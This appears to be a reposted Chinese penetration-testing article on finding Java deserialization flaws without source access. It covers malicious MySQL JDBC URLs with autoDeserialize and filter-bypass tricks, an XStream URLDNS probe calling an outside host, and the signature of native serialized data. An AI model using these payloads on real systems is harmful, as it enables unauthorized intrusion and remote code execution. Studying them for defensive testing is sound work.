实战攻防之黑盒挖掘Java反序列化漏洞

admin
admin
admin
0
文章
0
评论
2026-02-02 00:36:13 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文详解Java反序列化漏洞的黑盒挖掘实战技巧。涵盖JDBC反序列化在MySQL及H2数据库的利用与绕过方法,如参数替换与注释过滤。介绍XStream基于XML的检测链利用及原生反序列化的Base64特征识别。文中提供了针对不同场景的Payload构造与检测策略,对实战攻防具有指导意义。 综合评分: 82 文章分类: 实战经验,渗透测试,漏洞分析,WEB安全,漏洞POC

cover_image

实战攻防之黑盒挖掘Java反序列化漏洞

听风安全

2025年10月24日 16:23 天津

以下文章来源于有恒安全 ,作者有恒

有恒安全 .

安全技术知识分享

免责声明

由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

一、JDBC反序列化

JDBC 反序列化一般出现在跟数据库连接相关的功能里,比如数据源配置、连接测试这类地方。

常见的可利用数据库有 MySQL、H2、PostgreSQL等,不同数据库的利用方式不一样,比如 H2 和 MySQL 的 gadget 链和触发点就各不相同。我们可以通过在连接字符串里指定不同的驱动类名,然后看服务端的报错信息,来判断它有没有加载对应的驱动。

com.mysql.jdbc.Driverorg.h2.Driverorg.postgresql.Driver

1.1 MySQL

mysql的打法思路之前文章有提及,这里补充一下绕过手段。

jdbc:mysql://10.0.0.0:1234/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

过滤了true,可以使用yes代替。

jdbc:mysql://10.0.0.0:1234/test?autoDeserialize=yes&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

强行末尾添加 autoDeserialize=false的情况,可以使用 # 号注释掉强行添加的内容

jdbc:mysql://10.0.0.0:1234/test?autoDeserialize=yes&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#

1.2 H2

h2数据库的可以使用Java Chains生成

二、XStream反序列化

在XML格式传输的数据包中,除了常见的XXE漏洞外,还可能存XStream 反序列化漏洞。

用URLDNS链来探测,如果目标触发了DNS请求并回连到我们DNSLog,基本就能判断后端用了 XStream 组件。

<map>&nbsp;&nbsp;<entry>&nbsp; &nbsp;&nbsp;<url>http://192.166.80.9/1</url>&nbsp; &nbsp;&nbsp;<string></string></entry></map>

同样使用工具生成链子打

三、原生反序列化漏洞

最典型的特征:Base64编码以rO0AB开头,原始字节流开头是 AC ED 00 05(十六进制)。具体打法思路和前面类似。

不可错过的往期推荐哦

![](https://mmbiz.qpic.cn/mmbiz_gif/AFgdiaw95AaNY572lpficoa3l1cVE17VfZ4WDWhcMYWJbibW3UvQP4H2Izrsic6ZSlqnw3DtMzjzJHvuhGJ2V6CF2A/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&retryload=1&randomid=tfibc7o0&tp=webp#imgIndex=24)

实战中Java反序列化漏洞黑盒挖掘思路

[话题]聊一聊如何更优雅的实现自动化加解密?

一次对某涩涩APP的分析之旅

层层防护下的突破之道:帆软漏洞利用深度解析

开发者别大意!Node.js 未授权安全漏洞,你的服务器可能正在被攻击者远程操控。

实战案例三则分享(含人脸绕过)

利用解析差异复活某凌OA前台RCE

点击下方名片,关注我们

觉得内容不错,就点下“”和“在看

如果不想错过新的内容推送可以设为星标

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:听风安全 《实战攻防之黑盒挖掘Java反序列化漏洞》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0